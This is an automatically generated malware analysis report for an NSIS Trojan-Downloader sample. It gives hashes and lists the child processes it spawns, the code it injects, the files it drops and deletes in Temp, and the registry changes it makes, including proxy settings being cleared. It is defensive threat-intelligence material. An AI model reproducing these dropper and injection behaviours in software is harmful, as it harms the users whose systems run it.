Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 2a8f25cc1fb9b6a8a14ec60736204e6f
SHA1: a74b910fcf8ce654ff7c033db73829927da9ebb4
SHA256: 1962b2d744537ea4c47fd9558d603cff83277737549f96c7ecc3b9c947a6b08e
SSDeep: 49152:vkojVzPgTpZLN8lT0RwkducdYETwAUC6asxS1HDJ:vkrZLmKRwtcdYETwfC6aYSP
Size: 2660132 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: Windows 7 SP1 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
Setup__2140_il2.exe:3044
sevensetup.exe:2608
583afdedde2bb_ua.exe:1576
cpSetup.exe:2892
G5wycqyxwV.exe:3900
The Trojan injects its code into the following process(es):
Setup__2140_il2.exe:896
setup.exe:1104
%original file name%.exe:3584
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Setup__2140_il2.exe:3044 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (9382 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\index[1].htm (0 bytes)
The process Setup__2140_il2.exe:896 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\index[1].htm (7399 bytes)
The process sevensetup.exe:2608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (64 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8PAU9PHE.txt (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PXLM8U2Q.txt (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (253391 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss94B0.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\inetc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe (0 bytes)
The process cpSetup.exe:2892 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\318DR7NG\normal_bg[1].jpg (1633 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (384 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z6N4XLNR\appImg[1].jpg (4 bytes)
The process setup.exe:1104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\spc_player.dll (64 bytes)
The process G5wycqyxwV.exe:3900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (52926 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4673.tmp (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (58228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (871 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (4705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (31 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss4662.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\nsArray.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\1104817113 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\sevensetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\cpSetup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\NSISdl.dll (0 bytes)
The process %original file name%.exe:3584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\ItNP6AjIFY (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\G5wycqyxwV.exe (5293 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\30EV4AVE\583afdd9a9098[1].exe (3920 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\inetc.dll (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GPS1JHSL\launch_reb[1].htm (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp\B (38534 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn28B5.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi28E5.tmp (0 bytes)
Registry activity
The process Setup__2140_il2.exe:3044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"
[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"
[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3A 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\Setup__2140_il2_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
[HKCR\vinyls.tramell.1]
[HKCR\vinyls.tramell\CurVer]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Programmable]
[HKCR\vinyls.tramell.1\CLSID]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
[HKCR\vinyls.tramell]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}]
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable"
The process Setup__2140_il2.exe:896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\vinyls.tramell]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\TypeLib]
"(Default)" = "{a0e998a2-81f0-420b-a12b-563442cf5349}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0]
"(Default)" = "InstallerLib"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1479738615"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\ProgID]
"(Default)" = "vinyls.tramell.1"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\VersionIndependentProgID]
"(Default)" = "vinyls.tramell"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{A0E998A2-81F0-420B-A12B-563442CF5349}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"
[HKCR\vinyls.tramell.1\CLSID]
"(Default)" = "{dded0858-104b-4eec-a82e-a44b49d78594}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}\TypeLib]
"(Default)" = "{A0E998A2-81F0-420B-A12B-563442CF5349}"
[HKCR\Interface\{3669AAD1-E076-4750-857A-D9FFB5D3F180}]
"(Default)" = "IBoot"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}]
"(Default)" = "Inst Class"
[HKCR\vinyls.tramell.1]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il2.exe"
[HKCR\CLSID\{dded0858-104b-4eec-a82e-a44b49d78594}\Version]
"(Default)" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"
[HKCR\vinyls.tramell\CurVer]
"(Default)" = "vinyls.tramell.1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process sevensetup.exe:2608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASAPI32]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\sevensetup_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe,"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process 583afdedde2bb_ua.exe:1576 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"processname" = "iexplore.exe"
"WindowClassName" = "DDEMLMom"
The process cpSetup.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1480239567"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "cpSetup.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "50 6C 24 3E C4 48 D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 37 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\cpSetup_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process G5wycqyxwV.exe:3900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\583afdedde2bb_ua.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi94C1.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi4683.tmp\Setup__2140_il2.exe,"
The process %original file name%.exe:3584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecision" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{24C5EDBC-2851-452A-B521-5DA992F6C1B5}"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadDecisionTime" = "10 CC 7D 3D C4 48 D2 01"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 09 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecision" = "3"
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 36 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{24C5EDBC-2851-452A-B521-5DA992F6C1B5}]
"WpadNetworkName" = "Network 2"
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\2a8f25cc1fb9b6a8a14ec60736204e6f_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-e1-da-d8]
"WpadDecisionTime" = "10 CC 7D 3D C4 48 D2 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
